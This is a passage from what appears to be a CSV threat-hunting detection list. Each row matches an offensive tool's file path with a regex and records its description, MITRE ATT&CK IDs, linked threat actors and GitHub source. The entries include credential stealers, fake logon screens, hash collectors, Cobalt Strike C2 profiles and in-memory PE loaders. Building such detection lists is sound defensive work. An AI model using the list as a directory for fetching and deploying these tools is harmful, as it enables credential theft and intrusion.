T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7168" "*/fakelogonscreen.exe*",".{0,1000}\/fakelogonscreen.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential 
Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7169" "*/fakelogonscreen.git*",".{0,1000}\/fakelogonscreen\.git.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7170" "*/fakelogonscreen/releases/download/*",".{0,1000}\/fakelogonscreen\/releases\/download\/.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7171" "*/fakelogonscreen/tarball/*",".{0,1000}\/fakelogonscreen\/tarball\/.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7172" "*/fakelogonscreen/zipball/*",".{0,1000}\/fakelogonscreen\/zipball\/.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","7173" "*/fake-sms.git*",".{0,1000}\/fake\-sms\.git.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone 
number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","7174" "*/fakewarning.dll*",".{0,1000}\/fakewarning\.dll.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7175" "*/Farmer.git*",".{0,1000}\/Farmer\.git.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","7176" "*/fastfuz-chrome-ext*",".{0,1000}\/fastfuz\-chrome\-ext.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Vulnerability Scanner","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","N/A","1","25","5","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z","7177" "*/FastPathMITM.py*",".{0,1000}\/FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a 
honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","7178" "*/fb_firstlast.7z*",".{0,1000}\/fb_firstlast\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","7179" "*/fb-brute.pl*",".{0,1000}\/fb\-brute\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","7180" "*/fcrdns.nse*",".{0,1000}\/fcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7181" "*/febinrev/dirtypipez-exploit*",".{0,1000}\/febinrev\/dirtypipez\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","7182" "*/Fentanyl.git*",".{0,1000}\/Fentanyl\.git.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers 
(Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","7183" "*/fern-wifi-cracker/*",".{0,1000}\/fern\-wifi\-cracker\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7184" "*/Ferrari.ps1*",".{0,1000}\/Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7185" "*/fetch-some-proxies.git*",".{0,1000}\/fetch\-some\-proxies\.git.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","1","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","7186" "*/ffuf.git*",".{0,1000}\/ffuf\.git.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","7187" "*/ffuf/ffufrc*",".{0,1000}\/ffuf\/ffufrc.{0,1000}","offensive_tool_keyword","ffuf","Fast web 
fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","7188" "*/fgdump.git*",".{0,1000}\/fgdump\.git.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","1","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","7189" "*/fiesta.profile*",".{0,1000}\/fiesta\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7191" "*/fiesta2.profile*",".{0,1000}\/fiesta2\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - 
REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7192" "*/File Encrypter Reverse Bytes.exe*",".{0,1000}\/File\sEncrypter\sReverse\sBytes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7193" "*/FileBasic_x64_Release.exe*",".{0,1000}\/FileBasic_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","7194" "*/FileCrawlerMITM.py*",".{0,1000}\/FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","7195" "*/FilelessPELoader*",".{0,1000}\/FilelessPELoader.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","7196" "*/File-Server.ps1*",".{0,1000}\/File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7197" "*/File-Tunnel.git*",".{0,1000}\/File\-Tunnel\.git.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","1","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","7198" "*/final_shellcode_size.txt*",".{0,1000}\/final_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P 
- Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","7201" "*/find_domain.sh*",".{0,1000}\/find_domain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","7202" "*/find-computer.py*",".{0,1000}\/find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7203" "*/findDelegation.py*",".{0,1000}\/findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7204" "*/FindModule.c*",".{0,1000}\/FindModule\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - 
FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","7205" "*/FindObjects.cna*",".{0,1000}\/FindObjects\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","7206" "*/FindSQLSrv.py*",".{0,1000}\/FindSQLSrv\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","7207" "*/finger.nse*",".{0,1000}\/finger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7208" "*/fingerprint-strings.nse*",".{0,1000}\/fingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7209" "*/firefox_decrypt.git*",".{0,1000}\/firefox_decrypt\.git.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","7210" "*/firefox_decrypt.py*",".{0,1000}\/firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","7211" "*/firewalk.nse*",".{0,1000}\/firewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7212" "*/firewall-bypass.nse*",".{0,1000}\/firewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7213" "*/flask:5000/supershell/*",".{0,1000}\/flask\:5000\/supershell\/.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","7214" "*/flatten-macho.m*",".{0,1000}\/flatten\-macho\.m.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7215" "*/flume-master-info.nse*",".{0,1000}\/flume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - 